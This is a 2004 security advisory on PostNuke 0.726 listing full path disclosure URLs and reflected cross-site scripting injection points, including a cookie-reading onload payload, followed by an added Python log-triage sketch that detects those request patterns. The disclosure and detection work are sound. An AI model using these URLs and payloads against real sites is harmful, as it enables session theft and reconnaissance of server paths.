`
{================================================================================}
{ [waraxe-2004-SA#022] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in PostNuke 0.726 Phoenix - part 2 ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 21. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=22
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PostNuke: The Phoenix Release (0.7.2.6)
PostNuke is an open source, open development content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
A1 - all blocks in "includes/blocks/" directory are not secured against direct access
Example:
http://localhost/postnuke0726/includes/blocks/finclude.php
Fatal error: Call to undefined function: pnsecaddschema() in D:\apache_wwwroot\postnuke0726\includes\blocks\finclude.php on line 44
A2 - many scripts in "pnadodb" directory are not secured against direct access
Example:
http://localhost/postnuke0726/pnadodb/drivers/adodb-access.inc.php
Warning: main(ADODB_DIR/drivers/adodb-odbc.inc.php): failed to open stream: No such file or directory in D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php on line 14
Warning: main(): Failed opening 'ADODB_DIR/drivers/adodb-odbc.inc.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php on line 14
Fatal error: Class adodb_access: Cannot inherit from undefined class adodb_odbc in D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php on line 19
A3 - full path disclosure in "NS-NewUser" module
http://localhost/postnuke0726/modules/NS-NewUser/user.php
Fatal error: Call to undefined function: modules_get_language() in D:\apache_wwwroot\postnuke0726\modules\NS-NewUser\user.php on line 31
A4 - full path disclosure in "NS-Your_Account" module
http://localhost/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php
http://localhost/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome
A5 - full path disclosure in "NS-LostPassword" module
http://localhost/postnuke0726/modules/NS-LostPassword/user.php
A6 - full path disclosure in "NS-Multisites" module
http://localhost/postnuke0726/modules/NS-Multisites/chgtheme.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/head.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/print.inc.php
A7 - full path disclosure in "NS-User" module
http://localhost/postnuke0726/modules/NS-User/tools.php
http://localhost/postnuke0726/modules/NS-User/user.php
B. Cross-site scripting aka XSS:
XSS exploits work on PostNuke only if special anti-filtering measures are used!
B1 - XSS in "Downloads" module (2 cases)
http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss code here]
http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss code here]
B2 - XSS in "Web_Links" module
http://localhost/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss code here]
B3 - XSS in "openwindow.php" script
http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here]
http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to UT Bee Clan members at http://bees.tk ! "Control point secured!" ;)
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[email protected]
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
`
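Added example, not part of the original advisory: a log triage sketch that flags requests matching the two classes reported above, direct requests to scripts under the directories in A1-A7 and markup characters in the parameters named in B1-B3. The function names, finding labels and sample log lines are constructed for illustration, and the path pattern assumes that no legitimate client requests those scripts directly.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Directories the advisory lists under A1-A7; assumed never requested directly.
DIRECT_ACCESS = re.compile(
    r"/(includes/blocks/[^/]+"
    r"|pnadodb/.+"
    r"|modules/NS-(NewUser|Your_Account|LostPassword|Multisites|User)/.+)\.php$",
    re.IGNORECASE,
)
# Parameters the advisory lists under B1-B3.
REFLECTED = {"lid", "query", "hlpfile"}
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [21/Apr/2004:10:00:00 +0300] "GET /postnuke0726/includes/blocks/finclude.php HTTP/1.1" 200 210',
    '192.0.2.10 - - [21/Apr/2004:10:00:05 +0300] "GET /postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=%3E%3Cb%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [21/Apr/2004:10:01:00 +0300] "GET /postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=phoenix HTTP/1.1" 200 5300',
    '192.0.2.12 - - [21/Apr/2004:10:02:00 +0300] "GET /postnuke0726/javascript/openwindow.php?hlpfile=x%3Chtml%3E HTTP/1.1" 200 90',
]

def classify(log_line):
    """Return a sorted list of finding labels for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    findings = set()
    # Decode the path so percent-encoded variants of the same file still match.
    if DIRECT_ACCESS.search(unquote(url.path)):
        findings.add("direct-access")
    # parse_qsl percent-decodes each value once before the markup check.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() in REFLECTED and MARKUP.search(value):
            findings.add("markup-in-" + name.lower())
    return sorted(findings)

def triage(lines):
    """Return (client, findings) for every line with at least one finding."""
    return [(l.split(" ", 1)[0], f) for l in lines if (f := classify(l))]

if __name__ == "__main__":
    for client, findings in triage(SAMPLE):
        print(client, ", ".join(findings))
```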